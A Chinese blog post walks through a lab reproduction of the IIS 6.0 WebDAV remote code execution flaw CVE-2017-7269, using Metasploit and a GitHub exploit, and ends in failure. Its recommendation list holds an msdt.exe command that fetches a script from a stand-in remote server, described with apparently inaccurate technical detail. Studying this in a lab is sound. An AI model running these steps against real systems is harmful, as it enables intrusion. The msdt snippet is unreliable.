IIS6.0漏洞之CVE-2017-7269 远程代码执行漏洞复现及Poc验证

最新推荐文章于 2022-04-04 13:14:41 发布
最新推荐文章于 2022-04-04 13:14:41 发布
阅读量3.5k 收藏 6
点赞数 2
分类专栏: 中间件漏洞 漏洞复现 渗透学习 文章标签: CVE-2017-7269 远程代码执行漏洞复现及poc验证
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41210745/article/details/103398262
版权

漏洞描述

CVE-2017-7269:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行

漏洞产生的原因

在Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞,在IIS 6.0处理 PROPFIND 指令的时候,由于对 url 的长度没有进行有效的长度控制和检查,导致执行memcpy对虚拟路径进行构造的时候,引发栈溢出,从而导致远程代码执行。

漏洞影响版本

Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0

漏洞复现

开启IIS 6.0的WebDAV

在github下载exp攻击脚本

将exp脚本放在该目录下:/usr/share/metasploit-framework/modules/exploits/windows/iis/

打开metasploit framework

注:在metasploit framework打开后如果有警告报错,请参考解决方案:

https://blog.csdn.net/qq_41210745/article/details/103406113

进入攻击脚本模块:

查看需要设置哪些参数

设置目标主机IP地址、http目标主机、攻击机IP地址、攻击载荷

查看设置后的参数

进行溢出

很遗憾,尝试了许多办法,如换个kali机、或者win2003依旧行不通,也许是2003镜像已经打过补丁导致执行失败!

做成功的小伙伴可参考以下连接继续:上传exe文件、提权、远程桌面连接等操作

漏洞修复:禁用WebDAV、开启防火墙等防护机制

Poc验证

脚本文件链接:https://github.com/edwardz246003/IIS_exploit/

7Riven
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在此展示全面的技术研究:其影响、可利用的场景和缓解措施。 该漏洞已在最近的 WinRAR v6.23 中修复,我们在这里还提供了另一种缓解措施。 ​ ​ 尽管其 CVE 等级很高,但成功利用所需的复杂性表明广泛滥用的可能性很低,这与广泛利用的 Log4j RCE 漏洞不同。  有趣的是,Chromium似乎也利用了unrar库:https://chromium.googlesource.com/chromium/src//6ff23b0604e2edbe7ef282564ea340f5c72ab91a^/ unrar库作为第三方依赖项合并到Chrome OS中是合理的,尽管没有显示其用法的代码引用。 在缓解策略方面,有几种可行的选择可供考虑: 完全修复:将 Winrar 更新到 6.23+ 将完全修复该问题。 修补程序
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
03-05
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
CVE-2017-7269-Echo-PoCCVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address端口 效果如下:
cve-2017-7269-iis6.0环境搭建及复现过程
04-30
cve-2017-7269-iis6.0环境搭建及复现过程 有详细的复现过程。及出错记录
cve-2017-7269.rb
04-11
msfconsole中,webdav漏洞iis服务提权工具。
CVE-2017-7269iis6.0远程代码执行漏洞复现
Fly_鹏程万里
05-04 1万+
前言趁着有时间,没事干,无聊!所以就拿CVE-2017-7269做一个简单的漏洞复现实战演练!下面就对该漏洞进行简单的简介以及复现漏洞描述漏洞编号:CVE-2017-7269发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)漏洞描述:IIS 6.0默认不开启WebDAV,一旦开启了WebDAV支持,安装了IIS6.0的服务器将可能受到该漏洞...
cve-2017-7269
qfslyy的博客
12-19 2297
CEV-2017-7269(过程,步骤,说明) 1、 在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas) (只是个人学习笔记) 在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas) 之后需要将包引入到msf中: 可以选择数据库方式,将cve包导入到msf中,也可以直接将包放在目录:/usr/share/metasploit-framework/modules/exploits/w
复现CVE-2017-7269(过程,步骤,说明)
XZ_______的博客
12-20 2878
配置环境:Windows server 2003 靶机 kali2.0以上版本 前言:做实验之前要确定一下靶机与攻击主机可以互相通信 一、配置Windows server 2003 靶机 1、打开添加/删除windows程序点击添加/删除windows组件 2、安装iis6.0中间件: 3、打开iisiis中的webDAV改为允许 4、打开网站找到默认网站右击属性,将ip地址改为本机ip地址 这个时候呢我们的靶机已经配置完毕了,接下来我们来配置我们的kali 二、开启kali (第一次使用msfc
网络安全2017-7269安全漏洞解析
qq_63060814的博客
04-04 6278
1,使用命令zenmap打开nmap图形化扫描工具,选择配置,点击新的配置或命令 找到模块http-webdav-scan,勾上选用该模块对目标靶机进行扫描 根据扫描结果的信息可以找到靶机的操作系统为Microsoft Windows Server 2003 R2,并且开启WebDAV服务的IIS6.0,初步可以确认该漏洞存在 服务器版本信息: 使用msfconsole命令打开metasploit漏洞测试平台 使用search命令搜索cve-2017-7269 ...
学着分析CVE-2017-7269 -- IIS 6.0 WebDAV远程代码执行漏洞
giantbranch的专栏
04-03 6924
简介 CVE编号:CVE-2017-7269 漏洞级别:严重 漏洞影响:Windows Server 2003 r2 IIS6.0 漏洞发现人:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞类型:缓冲区溢出 实验环境 Windows Server 2003 r2 IIS6.0 procexp
cve-2017-7269-iis6.0 poc metersploit
04-30
cve-2017-7269-iis6.0poc 再metersploit中使用,亲测可用。
HTTP.sys远程执行代码漏洞验证复现——CVE-2015-1635、MS15-034
热门推荐
7Riven's blog
12-07 1万+
目录 漏洞概述 漏洞环境部署 漏洞验证 漏洞利用:ms15_034 漏洞防御 漏洞概述 HTTP.sys简介 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞 漏洞成因 远程执行代码漏洞存在于 ...
Redis未授权访问漏洞利用及防护措施(非常详细)
7Riven's blog
11-29 1万+
靶机(centos6.6):192.168.109.150 攻击机(kali-linux 2019.3):192.168.109.148 漏洞环境配置部署见:https://blog.csdn.net/qq_41210745/article/details/103305262 1.nmap存活主机扫描 2.发现疑似目标主机,扫描端口服务:找到目标端口6379 3.ka...
Nmap学习——目标主机、端口、操作系统和服务探测以及输出格式
7Riven's blog
11-11 7447
1.nmap简介 nmap是一个用于网络探测和安全/端口扫描的工具,全称Network Mapper(网络映射器),主要用来快速扫描大型网络,提供目标主机的各类信息,如:目标机的服务类型及状态、端口号、操作系统等信息。 nmap语法格式:nmap [<扫描类型>…] [<选项>] {<扫描目标说明>} nmap识别6种端口状态:open(开放的), clo...
常见端口漏洞及利用方式
7Riven's blog
11-09 5985
序号 软件/服务名称 端口 类型 可能存在的漏洞/利用方式 1 Apache 80/8080 中间件 解析漏洞 目录遍历 任意文件上传 2 Apache Group ActiveMQ 8161 中间件 远程代码执行 3 Docker 2375 中...
会话固定漏洞小结——概念、原理、检测及防御
7Riven's blog
12-29 5954
会话固定 概念 会话固定(Session fixation)是一种诱骗受害者使用攻击者指定的会话标识(SessionID)的攻击手段。这是攻击者获取合法会话标识的最简单的方法。会话固定也可以看成是会话劫持的一种类型,原因是会话固定的攻击的主要目的同样是获得目标用户的合法会话,不过会话固定还可以是强迫受害者使用攻击者设定的一个有效会话,以此来获得用户的敏感信息。 原理 访问网站时,网站会...
cve-2022-30190 msdt远程代码执行漏洞复现
最新发布
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值